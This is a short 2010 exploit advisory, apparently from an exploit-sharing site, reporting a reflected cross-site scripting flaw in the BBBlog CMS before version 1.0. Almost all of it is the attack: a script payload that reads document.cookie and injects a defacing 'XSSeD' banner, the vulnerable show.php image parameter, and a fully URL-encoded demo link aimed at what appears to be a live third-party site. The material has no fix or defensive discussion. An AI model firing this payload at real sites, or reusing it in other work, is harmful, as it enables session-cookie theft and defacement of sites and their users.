BBBlog < 1.0 XSS Vulnerability
Posted on 18 April 2010
============================== BBBlog < 1.0 XSS Vulnerability ============================== @Title: BBBlog < 1.0 XSS Vulnerability @Author: The_Exploited aka l3d aka Spoof @Mail: spoof@live.it @Site: http://site.securityspl0its.com/ - http://forum.securityspl0its.com/ @Exploit: "><script>alert(document.cookie)</script><marquee><b><font color=red><font size=9>XSSeD by The_Exploited //</font></font></b></marquee> @Demo: http://www.mysite.com/upload/show.php?image=[XSS] @Demo online: http://www.gyrls.com/upload/show.php?image=%22%3E%3Cscript%3Ealert%28document.cookie%29%3C/script%3E%3Cmarquee%3E%3Cb%3E%3Cfont%20color=red%3E%3Cfont%20size=9%3EXSSeD%20by%20The_Exploited%20//%3C/font%3E%3C/font%3E%3C/b%3E%3C/marquee%3E @CMS Version: < 1.0 @CMS Download: http://www.bigbang-media.com/ # Inj3ct0r.com [2010-04-18]